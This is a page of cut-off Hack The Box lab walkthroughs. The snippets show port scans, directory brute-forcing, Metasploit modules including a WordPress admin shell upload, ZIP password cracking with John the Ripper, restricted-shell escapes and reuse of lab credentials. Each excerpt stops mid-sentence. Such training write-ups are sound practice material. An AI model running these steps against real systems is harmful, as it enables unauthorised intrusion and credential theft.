$sudo nmap -A -T4 -p- 10.10.10.4
Open ports detected:
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Based on the detected ports, we have SMB here.
$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > run
Which SMB version do we have? Not sure yet…
$nmap -p 139 --script smb-protocols 10.10.10.4 -Pn
$nmap -p445 --script smb-protocols 10.10.10.4 -Pn
According

HTB Lame
$nmap -T4 -p- -A 10.10.10.3 -Pn
Open ports detected:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
$ftp 10.10.10.3
No files are detected.
$ssh 10.10.10.3
$msfconsole
Install Searchsploit:
$sudo apt update && sudo apt -y install exploitdb
$searchsploit
HTB Starting Point – Base
$./ennumeration.sh
Ports detected:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
$gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirb/big.txt
Interesting items found: /_uploaded and /login
Access to http://10.10.10.48 and http://10.10.10.48/login/login.php
The login folder can be listed (due to a misconfiguration of the web server).
Foothold
Download all three files to analyze them. login.php.swp is a binary file.
$ls -la
$file login.php.swp
As it is described, login.php.swp
HTB Starting Point – Guard
$./portScan.sh
The SSH port is open. Let’s try the last SSH user we obtained.
$ssh -i id_rsa daniel@10.10.10.50
The SSH login gives us access to a restricted shell, where commands like find, cat and python are disabled. We are unable to read user.txt from this shell. The man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a
HTB Starting Point – Markup
$./ennumeration.sh
Open ports:
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
$gobuster dir -u http://10.10.10.49 -w /usr/share/wordlists/dirb/common.txt
The Apache service is running. Let’s try to access the site.
Access to http://10.10.10.49
In the previous machine, we found credentials stored in an SQL dump. Let’s try to reuse them to log into the application. The
HTB Starting Point – Included
$./ennumeration.sh
Open ports detected:
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Access to: http://10.10.10.55
URL redirection to http://10.10.10.55/?file=index.php
Use OWASP ZAP to scan this site: this machine is vulnerable to a File Inclusion / Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a
HTB Starting Point – Pathfinder
$./ennumeration.sh
Open ports detected: WinRM 2.0 (Microsoft Windows Remote Management), which uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default.
Using the credentials we obtained in a previous machine, sandra:Password1234!, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a Python BloodHound ingester, which can be found here. Try using old machine credentials… BloodHound is a single
HTB Starting point – Shield
$ ./portScan.sh
Port 80 is open (Microsoft IIS running). Let’s try to see what’s inside…
$ gobuster dir -u http://10.10.10.29/wordpress -w /usr/share/wordlists/dirb/common.txt
There is a WordPress instance: http://10.10.10.29/wordpress/
Access to: http://10.10.10.29/wordpress/wp-login.php
Following the last machine’s general rule (let’s try old credentials): admin/P@s5w0rd! will work fine. Access to the WordPress Control Panel.
Let’s use the wp_admin_shell_upload Metasploit exploit to obtain a functional shell.
$ msfconsole
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
What do we need to use this exploit?
HTB Starting Point – Vaccine
kali@kali:~/ctf-tools$ ./portScan.sh
Remember we found an FTP user in the last machine. Try ftpuser / mc@F1l3ZilL4 and we’ll get access to this FTP server.
kali@kali:~/ctf-tools$ ftp 10.10.10.46
ftp> dir
ftp> get backup.zip
This file is password protected.
kali@kali:~/htb/vaccine$ sudo zip2john backup.zip > hash
zip2john processes input ZIP files into a format to be used with John the Ripper.
kali@kali:~/htb/vaccine$ sudo john hash --fork=4 --wordlist="/opt/rockyou.txt"
Different files are found inside the zip file. Open
HTB Starting point – Oopsie
ruben@kali:~/htb/oopsie$ sudo nmap -T4 -p- -A 10.10.10.28
We have port 80 open with Apache.
ruben@kali:~/htb/oopsie$ sudo nikto -h http://10.10.10.28
According to this result, we have a login site: /cdn-cgi/login/
ruben@kali:~/htb/oopsie$ gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e
There is an upload directory.
Access to: http://10.10.10.28/cdn-cgi/login
Test credentials from the last machine: admin/MEGACORP_4dm1n!!
The upload section is restricted to super admin. From the accounts section, using Burp Suite: we have a cookie with